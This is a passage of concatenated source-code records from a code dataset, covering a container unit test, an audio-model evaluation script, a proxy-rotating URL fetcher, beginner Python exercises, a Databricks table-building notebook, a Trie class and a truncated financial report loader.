OwtfContainer(TEST_CONTAINER_PATH)\n oc1.build_image()\n oc1.build_container()\n oc1.start()\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n self.assertTrue(oc.is_valid)\n self.assertTrue(oc.is_image_build)\n self.assertTrue(oc.is_container_build)\n self.assertTrue(oc.is_running)\n self.assertTrue(oc.container_id in [i['Id'] for i in cli.containers()])\n\nif __name__ == '__main__':\n unittest.main()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"test/test_owtfcontainer.py","file_name":"test_owtfcontainer.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"539524328","text":"import os\nimport json\nimport glob\nimport numpy as np\nimport torch\nimport tqdm\nfrom src.data.inmemory_lmdb_dataset import InMemorySpectrogramDataset\nfrom src.data.utils import _collate_fn, _collate_fn_multiclass\nfrom torch.utils.data import DataLoader\nfrom src.data.transforms import get_transforms_v2\nfrom src.models.gise_mixtures_lightning import GISEMixtures_Lightning\nfrom src.utilities.metrics_helper import calculate_stats, d_prime\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--ckpt_path\", type=str,\n help=\"path to model .ckpt\")\nparser.add_argument(\"--lbl_map\", type=str,\n help=\"path to label map .json file\")\nparser.add_argument(\"--lmdb_path\")\nparser.add_argument(\"--exp_dir\", type=str, default=None)\nparser.add_argument(\"--results_csv\", type=str, default='results.csv')\nparser.add_argument(\"--overlap_analysis\", action=\"store_true\")\nparser.add_argument(\"--export_weights\", action=\"store_true\")\nparser.add_argument(\"--export_dir\", type=str)\n\n\ndef eval_model(ckpt_path, val_tfs, overlap_analysis=False, export_weights=False, export_dir=None):\n # print(ckpt_path.split(\"/\"))\n splitted = ckpt_path.split(\"/\")\n print(splitted)\n # print(splitted[-4], splitted[-3])\n sub_dir = os.path.join(export_dir, splitted[-4], splitted[-3])\n # print(sub_dir)\n model_spec = \"/\".join([splitted[-6], splitted[-4],splitted[-3]])\n\n print(\"model_spec:\", model_spec)\n ckpt_ext = \"/\".join(ckpt_path.split(\"/\")[-6:])\n print(ckpt_ext)\n # print(\"Model: {}\".format(model_spec))\n model = GISEMixtures_Lightning.load_from_checkpoint(ckpt_path)\n model = model.cuda().eval()\n\n test_set = InMemorySpectrogramDataset(args.lmdb_path, args.lbl_map,\n model.hparams.cfg['audio_config'],\n transform=val_tfs, is_val=True)\n data_loader = DataLoader(test_set, num_workers=8, batch_size=128,\n shuffle=False, collate_fn=_collate_fn)\n test_predictions = []\n test_gts = []\n for batch in tqdm.tqdm(data_loader):\n x, _, y = batch\n x = x.cuda()\n with torch.no_grad():\n y_pred = model(x)\n sigmoid_preds = torch.sigmoid(y_pred)\n test_predictions.append(sigmoid_preds.detach().cpu())\n test_gts.append(y.detach().cpu())\n test_predictions = torch.cat(test_predictions, 0).numpy()\n test_gts = torch.cat(test_gts, 0).numpy()\n if overlap_analysis:\n with open(\"./metadata/overlapping_indices.json\", 'r') as fd:\n indices = json.load(fd)\n else:\n indices = None\n stats = calculate_stats(test_predictions, test_gts, class_indices=indices)\n mAP = np.mean([stat['AP'] for stat in stats])\n mAUC = np.mean([stat['auc'] for stat in stats])\n if export_weights:\n num_classes = model.hparams.cfg['model']['num_classes']\n splitted = ckpt_path.split(\"/\")\n sub_dir = os.path.join(export_dir, splitted[-4], splitted[-3])\n if not os.path.exists(sub_dir):\n os.makedirs(sub_dir)\n pth_path = os.path.join(sub_dir,\n \"mAP={:.4f}_dprime={:.4f}_num_classes={}.pth\".format(mAP, d_prime(mAUC), num_classes)\n )\n model.export_state_dict(pth_path)\n # print(\"mAP: {:.6f}\".format(mAP))\n # print(\"mAUC: {:.6f}\".format(mAUC))\n # print(\"dprime: {:.6f}\".format(d_prime(mAUC)))\n return {\n \"name\": model_spec,\n \"run\": splitted[-6],\n \"train_set\": splitted[-3],\n \"ckpt_ext\": ckpt_ext,\n \"mAP\": mAP, \"mAUC\": mAUC, \"dprime\": d_prime(mAUC)\n }\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n # model = FSD50kMixtures_Lightning.load_from_checkpoint(args.ckpt_path)\n # model = model.cuda().eval()\n val_tfs = get_transforms_v2(False, 501)\n if args.exp_dir is None:\n print(eval_model(args.ckpt_path, val_tfs))\n else:\n # mixup / efficientnet - b1_lmdb_adam_64_adam / train_p2\n ckpts = glob.glob(os.path.join(args.exp_dir, \"*\", \"*\", \"*\", \"ckpts\", \"*.ckpt\"))\n # print(\"num ckpts:\", len(ckpts))\n results = []\n fd = open(args.results_csv, \"w\")\n fd.writelines(\"Model,run,train_set,mAP,mAUC,dprime,ckpt_path\\n\")\n for f in ckpts:\n res = eval_model(f, val_tfs, args.overlap_analysis, args.export_weights, args.export_dir)\n line = \"{},{},{},{},{},{},{}\\n\".format(res['name'], res['run'], res['train_set'],\n res['mAP'],\n res['mAUC'], res['dprime'],\n res['ckpt_ext'])\n results.append(line)\n fd.writelines(line)\n fd.close()\n print(\"Results written to: \", args.results_csv)\n","sub_path":"eval_all_mixtures.py","file_name":"eval_all_mixtures.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"378137806","text":"from __future__ import division, print_function\nfrom __future__ import absolute_import\nfrom . import proxy_handling\nimport six.moves.urllib.request, six.moves.urllib.error, six.moves.urllib.parse\nimport threading\nimport re\n\n# Try to send request through a TOR\n# try:\n# import socks # SocksiPy module\n# import socket\n# SOCKS_PORT = 9150 # 9050\n# def create_connection(address, timeout=None, source_address=None):\n# sock = socks.socksocket()\n# sock.connect(address)\n# return sock\n# socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, \"127.0.0.1\", SOCKS_PORT)\n# socket.socket = socks.socksocket\n# socket.create_connection = create_connection\n# print(\"WITH PROXY\")\n# except:\n# pass\n\nimport socket\n# import urllib\nimport math\nfrom .logger import logger\nfrom six.moves import range\n\n\ndef y2lat(y):\n return (2 * math.atan(math.exp(y / 6378137)) - math.pi / 2) / (math.pi / 180)\n\n\ndef x2lon(x):\n return x / (math.pi / 180.0) / 6378137.0\n\n\ndef xy2lonlat(x, y):\n return [x2lon(x), y2lat(y)]\n\n\n# REFERER = 'https://www.google.com/'\n# USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'\n\nREFERER = 'http://gis-lab.info/forum/viewtopic.php?t=25520'\nUSER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0'\nDEFAULT_TIMEOUT = 60\n\nclass TimeoutException(Exception):\n pass\n\n\ndef make_request(url, with_proxy=False, timeout=DEFAULT_TIMEOUT):\n # original function\n if url:\n #url = url.encode('utf-8')\n logger.debug(url)\n if with_proxy:\n return make_request_with_proxy(url, timeout=timeout)\n try:\n headers = {\n 'Referer': REFERER, \n 'User-Agent': USER_AGENT,\n 'Upgrade-Insecure-Requests': 1\n }\n req = six.moves.urllib.request.Request(url, headers=headers)\n f = six.moves.urllib.request.urlopen(req, timeout=timeout)\n read = f.read()\n return read\n except Exception as er:\n logger.warning(er)\n raise TimeoutException()\n return False\n\n\ndef make_request_with_proxy(url, timeout=DEFAULT_TIMEOUT):\n proxies = proxy_handling.load_proxies()\n if not proxies:\n proxy_handling.update_proxies()\n proxies = proxy_handling.load_proxies_from_file()\n tries = 1 # number of tries for each proxy\n for proxy in reversed(proxies):\n for i in range(1, tries+1): # how many tries for each proxy\n try:\n # print('%i iteration of proxy %s' % (i, proxy), end=\"\")\n proxy_handler = six.moves.urllib.request.ProxyHandler({'http': proxy, 'https': proxy})\n opener = six.moves.urllib.request.build_opener(proxy_handler)\n six.moves.urllib.request.install_opener(opener)\n headers = {\n 'Referer': REFERER,\n 'User-Agent': USER_AGENT,\n 'Upgrade-Insecure-Requests': 1\n }\n request = six.moves.urllib.request.Request(url, headers=headers)\n f = six.moves.urllib.request.urlopen(request, timeout=timeout)\n read = f.read()\n if read.find('400 Bad Request') == -1:\n return read\n except Exception as er:\n logger.warning(er)\n if i == tries:\n proxies.remove(proxy)\n proxy_handling.dump_proxies_to_file(proxies)\n\n # if here, the result is not received\n # try with the new proxy list\n return make_request_with_proxy(url)\n\n","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"33854009","text":"'''Написать программу, которая генерирует в указанных пользователем границах:\na. случайное целое число,\nb. случайное вещественное число,\nc. случайный символ.\nДля каждого из трех случаев пользователь задает свои границы диапазона. Например,\n если надо получить случайный символ от 'a' до 'f', то вводятся эти символы. Программа\n должна вывести на экран любой символ алфавита от 'a' до 'f' включительно.'''\n\nimport random\n\nnum_1,num_2 = map(int,input('Введите диапазон чисел для выбора целого числа -->').split())\nreal_num_1, real_num_2 = map(int,input('Введите диапазон чисел для выбора вещественного числа -->').split())\nletter_1,letter_2 = map(str,input('Введите диапазон для выбора буквы (s z) -->').split())\n\nnum_2,real_num_2 = num_2 +1, real_num_2 + 1\nletter_1,letter_2 = ord(letter_1), ord(letter_2) + 1\nnumber = random.randint(num_1,num_2)\nreal_number = random.uniform(real_num_1, real_num_2)\nletter = chr(random.randint(letter_1, letter_2))\n\nprint(f'целое число: {number}\\nвещественное число: {real_number}\\nбуква: {letter}')","sub_path":"algorithms_and_data_structure/Lesson_1/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"245899367","text":"# Databricks notebook source\ndbutils.widgets.text(\"schmNm\", \"\", \"\")\ndbutils.widgets.text(\"tblNm\", \"\", \"\")\n\ndbutils.widgets.text(\"deltaTS\", \"\", \"\")\ndbutils.widgets.text(\"initFlg\", \"\", \"\")\n\ndeltaTS = dbutils.widgets.get(\"deltaTS\")\ninitFlg = dbutils.widgets.get(\"initFlg\")\nschmNm = dbutils.widgets.get(\"schmNm\")\ntblNm = dbutils.widgets.get(\"tblNm\")\n\n# Update the Timestamp to remove T\ndeltaTS = deltaTS.replace('T',' ')\n\n# COMMAND ----------\n\nif initFlg == \"X\" :\n dltaPath = \"/mnt/entadls/published/eim/managed/csc/DimSeason\"\n dbutils.fs.rm(dltaPath ,True)\n dropPermTable = \"DROP TABLE IF EXISTS {0}.{1}\".format(schmNm, tblNm)\n spark.sql(dropPermTable)\nif initFlg == \"Y\" :\n truncTable = \"DELETE FROM {0}.{1}\".format(schmNm, tblNm)\n spark.sql(truncTable)\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC CREATE DATABASE IF NOT EXISTS csc\n# MAGIC location '/mnt/entadls/published/eim/managed/csc';\n# MAGIC CREATE TABLE IF NOT EXISTS csc.DimSeason\n# MAGIC (\n# MAGIC DimSeasonKey int,\n# MAGIC SeasonCode string,\n# MAGIC SortNumber int,\n# MAGIC YearNumber int,\n# MAGIC SeasonCodePrefix string,\n# MAGIC SeasonCodeSuffix string,\n# MAGIC EDW_CRT_TS timestamp,\n# MAGIC EDW_UPDT_TS timestamp, \n# MAGIC EDW_HASH_CHK string,\n# MAGIC EDW_ACTV_FLG string\n# MAGIC )\n# MAGIC USING DELTA\n# MAGIC -- PARTITIONED BY (DOC_YR_NBR)\n# MAGIC LOCATION \"/mnt/entadls/published/eim/managed/csc/DimSeason\"\n\n# COMMAND ----------\n\ndbutils.notebook.run(\"/Users/svceimdbrx@columbia.com/edw_admin/adw_integration_read\", 120, {\"schemaNm\": \"ENTPR_FOUNDATION_VIEW\", \"tableNm\": \"SEAS_CNV\", \"notebookNm\": \"SEAS_CNV\"})\n\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE OR REPLACE TEMP VIEW DimSeasontemp\n# MAGIC AS\n# MAGIC select \n# MAGIC -1 AS DimSeasonKey ,\n# MAGIC SEAS_CD AS SeasonCode ,\n# MAGIC SEAS_SORT_NBR AS SortNumber ,\n# MAGIC SEAS_YR_NBR AS YearNumber ,\n# MAGIC SEAS_CD_FRST_LTR AS SeasonCodePrefix ,\n# MAGIC SEAS_SHRT_YR_CD AS SeasonCodeSuffix ,\n# MAGIC CURRENT_TIMESTAMP AS EDW_CRT_TS ,\n# MAGIC CURRENT_TIMESTAMP AS EDW_UPDT_TS ,\n# MAGIC CAST(NULL AS STRING) AS EDW_HASH_CHK ,\n# MAGIC 'Y' AS EDW_ACTV_FLG\n# MAGIC from global_temp.gbl_SEAS_CNV_SEAS_CNV\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC DROP VIEW IF EXISTS global_temp.DimSeason\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW DimSeason\n# MAGIC AS\n# MAGIC select * from DimSeasontemp\n\n# COMMAND ----------\n\n#all those notebooks that should write to Azure datawarehouse should include the below code.\n#schemaNm = landing schema in Azure datawarehouse.Schema will gets created if not exists. Naming Standard: DatabaseName_LND \n#Ex: ENTPR_PRODUCT_LND, ENTPR_CUSTOMER_LND, ENTPR_RETAIL_LND..\n#tableNm = This is the datawarehouse table name \n#dbrxTable = This is the databricks global table name\n# To view the processing of this reusable notebook, click on the notebook job(below in blue) while or after execution. \ndbutils.notebook.run(\"/Users/svceimdbrx@columbia.com/edw_admin/adw_integration_write\", 120, {\"schemaNm\": \"CSC_LND\", \"tableNm\": \"DimSeason\", \"dbrxTable\": \"DimSeason\", \"writeMode\": \"overwrite\"})\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC MERGE INTO CSC.DimSeason tgt\n# MAGIC USING global_temp.DimSeason src\n# MAGIC ON tgt.SeasonCode = src.SeasonCode\n# MAGIC WHEN MATCHED THEN\n# MAGIC UPDATE SET\n# MAGIC tgt.DimSeasonKey = src.DimSeasonKey\n# MAGIC ,tgt.SortNumber = src.SortNumber \n# MAGIC ,tgt.YearNumber = src.YearNumber \n# MAGIC ,tgt.SeasonCodePrefix = src.SeasonCodePrefix \n# MAGIC ,tgt.SeasonCodeSuffix = src.SeasonCodeSuffix \n# MAGIC ,tgt.EDW_CRT_TS = src.EDW_CRT_TS \n# MAGIC ,tgt.EDW_UPDT_TS = CURRENT_TIMESTAMP \n# MAGIC ,tgt.EDW_HASH_CHK = src.EDW_HASH_CHK \n# MAGIC ,tgt.EDW_ACTV_FLG = src.EDW_ACTV_FLG\n# MAGIC WHEN NOT MATCHED \n# MAGIC THEN INSERT\n# MAGIC (\n# MAGIC DimSeasonKey \n# MAGIC ,SeasonCode \n# MAGIC ,SortNumber \n# MAGIC ,YearNumber \n# MAGIC ,SeasonCodePrefix \n# MAGIC ,SeasonCodeSuffix \n# MAGIC ,EDW_CRT_TS \n# MAGIC ,EDW_UPDT_TS \n# MAGIC ,EDW_HASH_CHK \n# MAGIC ,EDW_ACTV_FLG\n# MAGIC )\n# MAGIC VALUES\n# MAGIC (\n# MAGIC src.DimSeasonKey \n# MAGIC ,src.SeasonCode \n# MAGIC ,src.SortNumber \n# MAGIC ,src.YearNumber \n# MAGIC ,src.SeasonCodePrefix \n# MAGIC ,src.SeasonCodeSuffix \n# MAGIC ,current_timestamp \n# MAGIC ,current_timestamp \n# MAGIC ,src.EDW_HASH_CHK \n# MAGIC ,src.EDW_ACTV_FLG\n# MAGIC );\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC OPTIMIZE CSC.DimSeason ; \n# MAGIC VACUUM CSC.DimSeason RETAIN 168 HOURS;\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE DATABASE IF NOT EXISTS CSC_VIEW;\n# MAGIC CREATE OR REPLACE VIEW CSC_VIEW.DimSeason \n# MAGIC AS\n# MAGIC SELECT\n# MAGIC DimSeasonKey \n# MAGIC ,SeasonCode \n# MAGIC ,SortNumber \n# MAGIC ,YearNumber \n# MAGIC ,SeasonCodePrefix \n# MAGIC ,SeasonCodeSuffix \n# MAGIC ,EDW_CRT_TS \n# MAGIC ,EDW_UPDT_TS \n# MAGIC ,EDW_HASH_CHK \n# MAGIC ,EDW_ACTV_FLG\n# MAGIC FROM CSC.DimSeason\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC DROP VIEW IF EXISTS global_temp.gbl_SEAS_CNV_SEAS_CNV ;\n# MAGIC DROP VIEW IF EXISTS global_temp.DimSeason ;\n","sub_path":"Prod/csc/dimseason.py","file_name":"dimseason.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"448709036","text":"__author__ = 'Stephen'\n\n\nclass Trie:\n \"\"\"A linked implementation of a non-linear tree data structure used to store words. Also known as a prefix tree.\n \"\"\"\n def __init__(self):\n self.root = Node(None)\n\n def __contains__(self, item):\n \"\"\"Tests whether this Trie contains the given item. Has efficiency of O(k) where k is the length of the given\n word.\n :param item: The item to check for inclusion in this trie\n :return: True if the item is contained in this trie\n \"\"\"\n walker = self.root\n i = 0\n while i < len(item) and item[i] in walker: # each character in the given word is the key for the next branch\n walker = walker[item[i]] # keep walking so long as the key is present\n i += 1\n return not (i < len(item)) # if i didn't make it to the length of the given word then the word was not found\n\n def next(self):\n \"\"\"Generator function that returns all complete words from this trie\n \"\"\"\n for terminal in self.root.terminals():\n yield terminal\n\n def find(self, prefix):\n \"\"\"Finds and returns the node corresponding to the given prefix if it is present in this trie.\n :param prefix: The prefix to search for.\n :return: The node representing the given prefix in this trie. Returns None if the prefix was not found.\n \"\"\"\n walker = self.root\n i = 0\n while i < len(prefix): # walk Trie to find the node that contains the prefix\n if prefix[i] not in walker: # return None if prefix not found\n return None\n walker = walker[prefix[i]]\n i += 1\n return walker\n\n def add(self, item):\n \"\"\"Adds the given item to this Trie.\n :param item: The item to be added\n \"\"\"\n self.root.add(item)\n\n\nclass Node:\n \"\"\"Each node in a trie stores a dict of children nodes. The keys in this dict determine the letter associated with\n that branch. A collection of branches is what makes up a word. A node is marked as terminal if all previous branches\n constitute a complete word.\n \"\"\"\n def __init__(self, parent):\n self.parent = parent\n self.children = {}\n self.terminal = False\n\n def __contains__(self, item):\n if len(item) is 1:\n return item in self.children\n else:\n if item[0] in self:\n return item[1:] in self[item[0]]\n else:\n return False\n\n def __getitem__(self, item):\n return self.children[item]\n\n def terminals(self, prefix=\"\"):\n \"\"\"Yields this node's 'terminal' child nodes. A terminal node is one whose prefix is marked as significant. In\n the case of strings this generally means the combination of keys / paths leading to a significant node\n represents a whole word.\n :param prefix: The in order sequence of keys associated with this node's ancestors. Required because it is more\n efficient to pass the prefixes downstream than to retrieve them on each iteration.\n \"\"\"\n if self.terminal:\n yield prefix\n for key, child in self.children.items():\n for terminal in child.terminals(prefix + key):\n yield terminal\n\n def add(self, item):\n \"\"\"Adds the given item to this node. This node will add the first character of the item as a child in its dict.\n That child will then contain the second character in the item and so on.\n :param item: The item to add to this node\n \"\"\"\n if len(item) is 0: # if all parts have already been added by ancestors...\n self.terminal = True # this node must be terminal\n else:\n part = item[0]\n if part not in self.children:\n self.children.update({part: Node(self)}) # add first part to children dictionary\n self[part].add(item[1:]) # pass remaining parts to child\n","sub_path":"Assignment2/WordLadder/Trie.py","file_name":"Trie.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"467701692","text":"# Грузовику с посылкой нужно доставить груз из пункта Казани в пункт Крым.\r\n# В Крыму,как гористой местности, имеется много дорог, каждая из которых\r\n# проходит через несколько туннелей.\r\n\r\n# Программа выводит оптимальный путь и максимальную высоту,\r\n# которую может иметь грузовик, чтобы проехать сквозь туннель и не застрять.\r\nnumber_of_roads = int(input('Сколько имеется дорог:'))\r\nchosen_road = 0\r\nchosen_height = 0\r\nmin_height = 0\r\nfor road_counter in range(1, number_of_roads + 1):\r\n size_of_road = int(input('Через сколько туннелей проходит путь:'))\r\n if 0 == chosen_road:\r\n chosen_road = road_counter\r\n min_height = 0\r\n for tunnel_counter in range(size_of_road):\r\n tunnel_height = int(input('H туннеля:'))\r\n if 0 == min_height:\r\n min_height = tunnel_height\r\n if min_height > tunnel_height:\r\n min_height = tunnel_height\r\n print('---', chosen_road, chosen_height, min_height)\r\n if 0 == chosen_height:\r\n chosen_height = min_height\r\n continue\r\n if chosen_height < min_height:\r\n chosen_height = min_height\r\n chosen_road = road_counter\r\nprint(chosen_road, chosen_height)\r\n","sub_path":"Основы программирования Python/8. Nested Loops/Грузовик в Крыму — трассировка.py","file_name":"Грузовик в Крыму — трассировка.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"618283260","text":"import os\nimport sys\nimport re\nimport glob\nimport datetime\nimport numpy as np\nimport pandas as pd\nfrom XmlHandler import XmlHandler\nfrom dateutil.rrule import DAILY, rrule, MO, TU, WE, TH, FR\n\nMKT_DICT = {\n\t\"HKEX\": \"HK\",\n\t\"HKSSE\": \"C1\",\n\t\"HKSZSE\": \"C2\",\n}\n\nCONST_DIC = {\n\t\"cur_dt\": \"\",\n\t\"cln_detail_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\ClientDetails_????????.xlsx\",\n\t\"msse_bal_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE Daily Balance (PB) ????????.xls\",\n\t\"mssd_bal_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSD Daily Balance (PB) ????????.xls\",\n\t\"mssd_trd_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSD Daily Trade (PB) ????????.xls\",\n\t\"msse_trd_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE Daily Trade (PB) ????????.xls\",\n\t\"msseo_trd_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE EO Daily Trade (PB) ????????.xls\",\n\t\"msse_pos_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE Daily Position (PB) ????????.xls\",\n\t\"msse_trans_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE Daily Fund Movement (PB) ????????.xls\",\n\t\"msseo_pos_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSE EO Daily Position (PB) ????????.xls\",\n\t\"mssd_pos_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\mss_pb_reports\\MSSD Daily Position (PB) ????????.xls\",\n\t\"os_sbl_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\OS_Trades_Extract_????.CSV\",\n\t\"pd_sbl_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\Pending_Trades_Extract_????.CSV\",\n\t\"stk_sbl_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\Stock_Extract_????.CSV\",\n\t\"fx_sbl_path\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\EX_Rate_Extract_????.CSV\",\n\t\"client_report_file\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\config\\pb_client_account.xlsx\",\n\t\"exposure_file\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\PB_DeltaOne\\Daily_Data\\Exposure_Reporting ????????.xml\",\n\t\"consol_data_file\": r\"\\\\p7fs0003\\nd\\3033-Horizon-FA-Share\\Cash_PB_Reports\\data\\daily_????????.xlsx\",\n\t\"trd_dt_range\": 99,\n\t\"setl_dt_range\": 4,\n}\n\nG1_MKT_DICT= {\n\t\"HKD\": \"HKEX\",\n}\n\ndef xlsx_to_df(input_file, sheet=0, na=0, dtype={}):\n\tdf = pd.read_excel(input_file, sheetname=sheet, dtype=dtype)\n\tdf.columns = [re.sub(r\"[\\*\\.#/\\$%\\\"\\(\\)& :]\", \"\", c) for c in df.columns]\n\tdf = df.fillna(na)\n\treturn df\n\ndef import_client():\n\tif CONST_DIC[\"cur_dt\"] == \"\":\n\t\tmsse_trd_file = max(glob.iglob(CONST_DIC[\"msse_trd_path\"]))\n\t\tCONST_DIC[\"cur_dt\"] = datetime.datetime.strptime(msse_trd_file[-12:-4], \"%Y%m%d\")\n\n\t# CONST_DIC[\"cur_dt\"] = datetime.datetime.strptime(input_file[-13:-5], \"%Y%m%d\")\n\n\tinput_file = CONST_DIC[\"client_report_file\"]\n\tprint (input_file)\n\n\treturn xlsx_to_df(input_file)\n\ndef import_trd(client_df):\n\tmsse_trd_file = CONST_DIC[\"msse_trd_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tmsse_trans_file = CONST_DIC[\"msse_trans_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (msse_trd_file)\n\tprint (msse_trans_file)\n\n\tmsse_trd_df = xlsx_to_df(msse_trd_file, dtype={\"INSTR_DSPLY_CDE\":\"str\"})\n\tmsse_trd_df = pd.merge(msse_trd_df, client_df[[\"AccountNo\", \"FAName\"]].rename(columns={\"AccountNo\": \"AC_ID\", \"FAName\": \"Client\"}), on=[\"AC_ID\"], how=\"inner\")\n\tmsse_trd_df[\"AMOUNT\"] = np.where(msse_trd_df[\"TXN_TYP_ACTN_CDE\"] == \"BUY\", -msse_trd_df[\"AMOUNT\"], msse_trd_df[\"AMOUNT\"])\n\n\tmsse_trans_df = xlsx_to_df(msse_trans_file)\n\tmsse_trans_df[\"TXN_TYP_NAM\"] = msse_trans_df[\"TXN_TYP_NAM\"].astype(\"str\")\n\tmsse_trans_df = msse_trans_df.loc[msse_trans_df.TXN_TYP_NAM == \"Clearing Fee\"]\n\tmsse_trans_df[\"INSTR_TYP_CDE\"] = \"BOND\"\n\tmsse_trans_df = pd.merge(msse_trans_df, client_df[[\"AccountNo\", \"FAName\"]].rename(columns={\"AccountNo\": \"AC_ID\", \"FAName\": \"Client\"}), on=[\"AC_ID\"], how=\"inner\")\n\tmsse_trans_df = msse_trans_df.rename(columns={\"TXNAMOUNT\":\"AMOUNT\", \"VALUEDATE\":\"SETL_DATE\",\"QUANTITY\":\"STK_QTY\",\"UNITPRICE\":\"PRICE\",\"STMTTRANSACTIONDATE\":\"INPT_DATE\"})[[\"AC_ID\", \"Client\", \"AMOUNT\", \"INSTR_DSPLY_CDE\", \"CCY_CDE\", \"INPT_DATE\", \"TRAD_DATE\", \"INSTR_TYP_CDE\", \"SETL_DATE\", \"STK_QTY\", \"PRICE\", \"REFERENCE\"]]\n\tmsse_trd_df = pd.concat([msse_trd_df, msse_trans_df], ignore_index=True)\n\t# mssd_trd_file = CONST_DIC[\"msse_trd_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\t# print (mssd_trd_file)\n\t# mssd_trd_df = xlsx_to_df(msse_trd_file)\n\n\tdata_files = glob.glob(CONST_DIC[\"consol_data_file\"])\n\tdata_files = list(filter(lambda x: x[-13:-5] < CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"), data_files))\n\tif len(data_files) > 0:\n\t\tconsol_xlsx = max(data_files)\n\t\tprint (consol_xlsx)\n\t\tprev_trd_df = xlsx_to_df(consol_xlsx, sheet=\"unsetl_trd\", na=\"\", dtype={\"INSTR_DSPLY_CDE\":\"str\"})\n\t\tprev_trd_df = prev_trd_df.loc[(prev_trd_df.INPT_DATE.astype('datetime64[ns]') < CONST_DIC[\"cur_dt\"]) & (prev_trd_df.SETL_DATE.astype('datetime64[ns]') >= CONST_DIC[\"cur_dt\"])]\n\t\tmsse_trd_df = pd.concat([prev_trd_df, msse_trd_df], ignore_index=True).drop([\"TRAD_PRICE_KEY\"], axis=1).drop_duplicates()\n\treturn msse_trd_df\n\ndef import_exposure():\n\texp_header, exp_arr = XmlHandler.xml_to_arr(CONST_DIC[\"exposure_file\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\")), start_row=3)\n\tdf = pd.DataFrame(exp_arr, columns=exp_header)\n\tdf.columns = [re.sub(r\"[\\*\\.#/\\$%\\\"\\(\\)& :]\", \"\", c) for c in df.columns]\n\tdf = df.fillna(\"\")\n\treturn df\n\ndef import_cash():\n\tmsse_file = CONST_DIC[\"msse_bal_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (msse_file)\n\tmssd_file = CONST_DIC[\"mssd_bal_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (mssd_file)\n\tmssd_file = CONST_DIC[\"mssd_bal_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (mssd_file)\n\t\n\tmsse_df = xlsx_to_df(msse_file)\n\tmssd_df = 